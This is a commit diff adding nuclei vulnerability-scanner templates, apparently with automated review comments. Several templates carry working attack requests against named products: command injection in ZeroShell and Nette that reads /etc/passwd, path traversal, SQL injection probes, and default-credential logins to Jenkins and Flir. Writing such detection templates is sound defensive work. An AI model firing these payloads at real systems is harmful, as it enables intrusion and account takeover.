Merge pull request #52 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-05-22 19:47:49 +05:30 committed by GitHub
commit a45af2f778
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
60 changed files with 1053 additions and 128 deletions

View File

@ -8,7 +8,6 @@
# unless asked for by the user.
tags:
- "headless"
- "dos"
- "iot"
- "misc"

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
| takeovers | 67 | exposures | 99 | technologies | 67 |
| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
| default-logins | 26 | exposed-tokens | 0 | dns | 8 |
| cves | 318 | vulnerabilities | 159 | exposed-panels | 131 |
| takeovers | 67 | exposures | 102 | technologies | 75 |
| misconfiguration | 63 | workflows | 31 | miscellaneous | 22 |
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 9 | helpers | 8 | iot | 11 |
**105 directories, 1085 files**.
**108 directories, 1120 files**.
</td>
</tr>

View File

@ -0,0 +1,20 @@
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference: https://www.exploit-db.com/exploits/8023
severity: critical
tags: cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"

View File

@ -0,0 +1,25 @@
id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference: |
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
severity: high
tags: cve,cve2014,lfi,nodejs,st
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
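Review bot: The description says the traversal is "in an unspecified path", but the request hardcodes `/public/` as the st mount point; applications mount st under other prefixes, so add a comment that `/public/` is an assumption (it follows the Snyk write-up) to explain negatives on differently mounted installs.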

View File

@ -8,10 +8,7 @@ info:
- https://www.exploit-db.com/exploits/47760
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
description: |
Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components
Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht
Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices
A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
tags: rce,yachtcontrol,cve,cve2019
requests:

View File

@ -0,0 +1,29 @@
id: CVE-2020-15227
info:
name: Nette Framework RCE
author: becivells
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:
- method: GET
path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200
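Review bot: The description needs a grammar pass: "vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE" reads better as "vulnerable to code injection via specially formed URL parameters, which may lead to RCE". The last two references (pwnwiki and the Penetration_Testing_POC mirror) restate the GitHub advisory; the advisory and NVD links are enough.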

View File

@ -0,0 +1,33 @@
id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
severity: critical
tags: cve,cve2020,sqli,cse
requests:
- raw:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
matchers:
- type: word
part: body
words:
- "get book price failed! You have an error in your SQL syntax"
- "Can't retrieve data You have an error in your SQL syntax"
condition: or
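Review bot: The raw request carries a captured browser session (`Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n`) plus DNT, Accept-* and Upgrade-Insecure-Requests headers that play no role in the check; drop them so the template is minimal and does not ship someone's session id. Also "successfull" in the description should be "successful".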

View File

@ -6,7 +6,7 @@ info:
severity: high
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
reference: https://www.tenable.com/security/research/tra-2020-51
tags: cve,cve2020,magmi
tags: cve,cve2020,magmi,magento
# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
# in the event that a CSRF is leveraged against an existing admin session for MAGMI.

View File

@ -6,7 +6,7 @@ info:
severity: high
description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
tags: cve,cve2020,magmi
tags: cve,cve2020,magmi,magento
# Response code 503 indicates a potential successful "Too many connections" error
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php

View File

@ -4,7 +4,20 @@ info:
name: ZyXEL NAS RCE
author: dhiyaneshDk
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054
description: |
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device.
ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it.
If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device.
Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges.
As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges.
By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device.
This may happen by directly connecting to a device if it is directly exposed to an attacker.
However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices.
For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system.
Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
reference: |
- https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
- https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
tags: cve,cve2020,rce
requests:
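Review bot: This hunk leaves `reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054` directly under `severity` and adds a second `reference: |` block after the description; unless the first line is being removed by this change, the template now carries a duplicate `reference` key, which YAML loaders either reject or silently resolve to the last value. Fold the NVD URL into the new list instead.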

View File

@ -1,10 +1,10 @@
id: CVE-2020-9490
info:
name: CVE-2020-9490 Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
author: philippedelteil
name: CVE-2020-9490
severity: medium
description: Detects apache versions 2.4.43, 2.4.39, 2.4.38, 2.4.37, 2.4.35, 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20 that are POTENTIALLY vulnerable to CVE-2020-9490
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
author: philippedelteil
tags: cve,cve2020,apache,dos
reference: |
- https://httpd.apache.org/security/vulnerabilities_24.html
@ -18,22 +18,7 @@ requests:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Apache/2.4.20"
- "Apache/2.4.23"
- "Apache/2.4.25"
- "Apache/2.4.26"
- "Apache/2.4.27"
- "Apache/2.4.28"
- "Apache/2.4.29"
- "Apache/2.4.30"
- "Apache/2.4.33"
- "Apache/2.4.34"
- "Apache/2.4.35"
- "Apache/2.4.37"
- "Apache/2.4.38"
- "Apache/2.4.39"
- "Apache/2.4.43"
- type: regex
regex:
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
part: header
condition: or
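Review bot: In the new regex `Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])` the alternative `[3-3][0-9]` is a one-character range and should read `3[0-9]` (the group can simply be `(2[0-9]|3[0-9]|4[0-3])`); the `condition: or` under a single-pattern matcher does nothing and can go. The rewritten description also drops the old "POTENTIALLY vulnerable" wording even though the check is still a banner match; distribution packages backport fixes without changing the advertised version, so keep that caveat next to the `H2Push off` mitigation the description already names.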

View File

@ -0,0 +1,27 @@
id: CVE-2021-24176
info:
name: WordPress JH 404 Logger XSS
author: Ganofins
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
references: |
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "JH 404 Logger"
part: body
- type: status
status:
- 200
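Review bot: The key is `references:` while every other template in this change uses `reference:`, so the links will not be picked up. The request only checks that `readme.txt` exists, which reports every install, including those past 1.1, at severity medium; extract the `Stable tag:` line from the readme and compare it against 1.1 to limit the match to affected versions.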

View File

@ -0,0 +1,57 @@
id: CVE-2021-27850
info:
name: Apache Tapestry - Arbitrary class download
description: |
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
author: pdteam
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
requests:
- raw:
- |
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
extractors:
- type: regex
regex:
- '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
internal: true
name: id
part: header
group: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'application/java'
part: header
- type: word
words:
- 'configuration'
- 'webtools'
part: body
condition: and
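Review bot: The description is pasted from the researcher's advisory in the first person ("The vulnerability I have found is a bypass...") and is missing a word ("was found all recent versions" should be "was found in all recent versions"); rewrite it in the template's neutral voice and cite the original advisory in `reference` alongside the NVD link.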

View File

@ -0,0 +1,20 @@
id: CVE-2021-29622
info:
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
author: geeknik
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
severity: medium
tags: cve,cve2021,prometheus,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/new/newhttp://example.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -4,7 +4,7 @@ info:
name: VoipMonitor Pre-Auth-RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

View File

@ -1,23 +0,0 @@
id: CVE-2021-31800
info:
name: Impacket directory traversal
author: geeknik
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
severity: high
tags: impacket,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
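Review bot: Removing this file is the right call: the request is a copy of the st module template (same `/public/%2e%2e/.../etc/passwd` path) while Impacket's smbserver.py speaks SMB, not HTTP, so the check could never exercise the traversal the description talks about.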

View File

@ -3,6 +3,7 @@ info:
name: DVWA Default Login
author: pdteam
severity: critical
tags: dvwa,default-login
requests:
- raw:

View File

@ -0,0 +1,41 @@
id: flir-default-credentials
info:
name: Flir Default Credentials
author: pikpikcu
severity: medium
tags: default-login,flir
requests:
- raw:
- |
POST /login/dologin HTTP/1.1
Host: {{Hostname}}
Content-Length: 35
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: closen
user_name=admin&user_password=admin
matchers-condition: and
matchers:
- type: word
words:
- '"success"'
- type: dsl
dsl:
- contains(tolower(all_headers), 'text/html')
- contains(tolower(all_headers), 'phpsessid')
- contains(tolower(all_headers), 'showcameraid')
condition: and
- type: status
status:
- 200
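Review bot: `Connection: closen` in the raw request should be `Connection: close`. Also, the word matcher `'"success"'` matches any JSON body carrying that key, including a failed login that returns `"success":false`; match the full key/value pair the device returns on a successful login.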

View File

@ -0,0 +1,50 @@
id: jenkins-weak-password
info:
name: Jenkins Weak Password
author: Zandros0
severity: high
tags: jenkins,default-login
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
- |
POST /j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: {{cookie}}
extractors:
- type: regex
name: cookie
internal: true
part: header
regex:
- 'JSESSIONID\..*=([a-z0-9.]+)'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_4, "/logout")'
- 'contains(body_4, "Dashboard [Jenkins]")'
condition: and
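Review bot: The `cookie` extractor runs on every response, so the value captured after a successful admin:admin login is overwritten if the second POST (jenkins:password) fails and the server issues a fresh JSESSIONID; request 4 would then use the failed session and the Dashboard match is lost. Consider one credential pair per template, or add per-response checks (e.g. on `status_code_2`/`status_code_3` and the Location header) so a successful login is attributed to a specific pair.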

View File

@ -22,11 +22,16 @@ requests:
- type: word
words:
- '"code":200'
- '"msg"'
- '"content"'
condition: and
- type: word
words:
- 'application/json'
- 'XXL_JOB_LOGIN_IDENTITY'
part: header
condition: and
- type: status
status:

View File

@ -0,0 +1,30 @@
id: exposed-nomad
info:
name: Exposed Nomad Jobs
author: pdteam
severity: high
tags: nomad,devops,hashicorp
reference: https://www.nomadproject.io/docs/internals/security
requests:
- method: GET
path:
- "{{BaseURL}}/ui/jobs"
matchers-condition: and
matchers:
- type: word
words:
- "Nomad"
- "nomad-ui"
condition: and
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
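Review bot: `/ui/jobs` serves the Nomad web UI's static bundle, which contains the strings `Nomad` and `nomad-ui` whether or not ACLs are enabled; the job list itself is fetched by the browser from the HTTP API. As written the template reports "Exposed Nomad Jobs" at severity high for any reachable UI. Matching on the `/v1/jobs` API returning 200 with a JSON job list would tie the finding to actual exposure, in line with the linked security docs.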

View File

@ -0,0 +1,21 @@
id: jenkins-login
info:
name: Jenkins Login
author: pdteam
severity: info
tags: panel,jenkins
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- 'Sign in [Jenkins]'
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: magento-admin-panel
info:
name: Exposed Magento Admin Panel
author: TechbrunchFR
severity: info
description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/admin'
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- "/admin/index/index/key/"
part: header

View File

@ -25,9 +25,6 @@ requests:
- "{{BaseURL}}/wp-config.php.bak"
- "{{BaseURL}}/wp-login.php.bak"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status

View File

@ -3,7 +3,7 @@ info:
name: Magento Config Disclosure
author: geeknik
severity: medium
tags: config,exposure
tags: config,exposure,magento
requests:
- method: GET

View File

@ -12,6 +12,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/.netrc"
- "{{BaseURL}}/_netrc"
matchers-condition: and
matchers:

View File

@ -0,0 +1,26 @@
id: ioncube-loader-wizard
info:
name: Ioncube Loader Wizard disclosure
author: Mubassirpatel
severity: medium
description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.
reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
tags: ioncube,disclosure,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/ioncube/loader-wizard.php"
- "{{BaseURL}}/loader-wizard.php"
matchers-condition: and
matchers:
- type: word
words:
- "ionCube Loader Wizard"
part: body
- type: status
status:
- 200
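Review bot: `description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.` is too vague for a severity medium finding; summarize the issues the linked firefart post documents and make clear that the match is on the wizard's page title (the wizard being reachable), not on exploitation of any of them.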

View File

@ -0,0 +1,26 @@
id: joomla-file-listing
info:
name: Joomla database files listing
author: iampritam
severity: info
reference: https://www.exploit-db.com/ghdb/6377
description: Searches for the pattern /libraries/joomla/database/ on passed URLs.
tags: exposure,joomla,listing
requests:
- method: GET
path:
- "{{BaseURL}}/libraries/joomla/database/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /libraries/joomla/database"
- "Parent Directory"
condition: and
- type: status
status:
- 200

View File

@ -3,31 +3,95 @@ Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Alt-Svc
Authorization
Base-Url
CF-Connecting-IP
Cache-Control
Client-IP
Cluster
Cluster-Client-IP
Connection
Contact
Content-Length
Content-MD5
Content-Type
Cookie
DNT
Date
Destination
Expect
Forwarded
From
Front-End-Https
HTTP_CLIENT_IP
HTTP_FORWARDED
HTTP_FORWARDED_FOR
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
Host
Http-Url
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Link
Location
Max-Forwards
Origin
Pragma
Profile
Proxy
Proxy-Authorization
Proxy-Connection
Proxy-Host
Proxy-Url
Range
Real-Ip
Redirect
Referer
Referrer
Refferer
Request-Uri
TE
True-Client-IP
UID
Upgrade
Uri
User-Agent
Via
Warning
X-ATT-DeviceId
X-Arbitrary
X-CSRFToken
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-Do-Not-Track
X-Forward-For
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Proto
X-Forwarded-Server
X-Forwarder-For
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-Original-Remote-Addr
X-Original-Url
X-Proxy-Url
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Request-ID
X-Requested-With
X-Rewrite-Url
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN

View File

@ -0,0 +1,20 @@
id: google-floc-disabled
info:
name: Google FLoC Disabled
author: geeknik
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
severity: info
tags: google,floc,misc
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "interest-cohort=()"
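Review bot: "explicity" in the description should be "explicitly"; the matched token `interest-cohort=()` is the Permissions-Policy directive, which is worth naming in the description so readers know which header produced the match.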

View File

@ -0,0 +1,25 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference: |
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
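Review bot: The `[A-z0-9...]` classes in the regex span the ASCII range between `Z` and `a` (`[`, `\`, `]`, `^`, `_`, backtick) rather than just letters; use `[A-Za-z0-9...]`. The pattern also only recognizes `target=\"_blank\"` with double quotes, so single-quoted or unquoted attributes are missed. Since current Chrome, Firefox and Safari treat `target=_blank` as `noopener` by default, severity info is appropriate, and that context belongs in the description.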

View File

@ -2,13 +2,13 @@ id: java-melody-exposed
info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
author: dhiyaneshDK & thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
reference: |
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
tags: config,jira,confluence,bamboo,atlassian
tags: config,java,javamelody
requests:
- method: GET

View File

@ -0,0 +1,36 @@
id: springboot-beans
info:
name: Detect Springboot Beans Actuator
author: ajaysenr
severity: low
description: Displays a complete list of all the Spring beans in the application
tags: springboot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/beans"
- "{{BaseURL}}/actuator/beans"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"type"'
- '"beans"'
- '"dependencies"'
- '"scope"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

View File

@ -10,6 +10,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:

View File

@ -0,0 +1,23 @@
id: fanruanoa-detect
info:
name: FanRuanOA-detect
author: YanYun
severity: info
tags: oa,tech,dotnet,fanruan
requests:
- method: GET
path:
- "{{BaseURL}}/WebReport/ReportServer"
- "{{BaseURL}}/ReportServer"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'DeploySuccess._init'
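Review bot: `tags: oa,tech,dotnet,fanruan` marks this as .NET while the sibling `fanruanoa2012-detect` in the same change tags `java`; FanRuan's ReportServer is a Java servlet, so `dotnet` looks like a copy error. A comment saying where `DeploySuccess._init` appears in the response would also help maintainers.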

View File

@ -0,0 +1,21 @@
id: fanruanoa2012-detect
info:
name: FanRuanOA2012-detect
author: YanYun
severity: info
tags: oa,java,fanruan,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'down.download?FM_SYS_ID'

View File

@ -0,0 +1,27 @@
id: landrayoa-detect
info:
name: LandrayOA detect
author: YanYun
severity: info
tags: tech,landrayoa
requests:
- method: GET
path:
- '{{BaseURL}}/login.jsp'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'lui_login_input_username'
- 'lui_login_input_password'
condition: and
- type: word
words:
- 'isopen='
part: header

View File

@ -0,0 +1,33 @@
id: magento-detect
info:
name: Magento Detect
author: TechbrunchFR
severity: info
description: Identify Magento
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
# https://devdocs.magento.com/guides/v2.4/graphql/
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(tolower(all_headers), "x-magento")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "graphql-authorization")'
- 'contains(body, "The current customer")'
- 'status_code == 200'
condition: and

View File

@ -1,20 +1,23 @@
id: magmi-detect
info:
name: "MAGMI (Magento Mass Importer) Plugin Detect"
author: "dwisiswant0"
severity: "info"
name: MAGMI (Magento Mass Importer) Plugin Detect
author: dwisiswant0
severity: info
tags: magento,magmi
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/js/magmi_utils.js"
matchers-condition: and
matchers:
- type: word
words:
- "magmi_multifield"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: octobercms-detect
info:
name: OctoberCMS detect
author: cyllective
severity: info
description: Detects OctoberCMS
tags: tech,octobercms
references: https://github.com/octobercms/october
requests:
- method: GET
path:
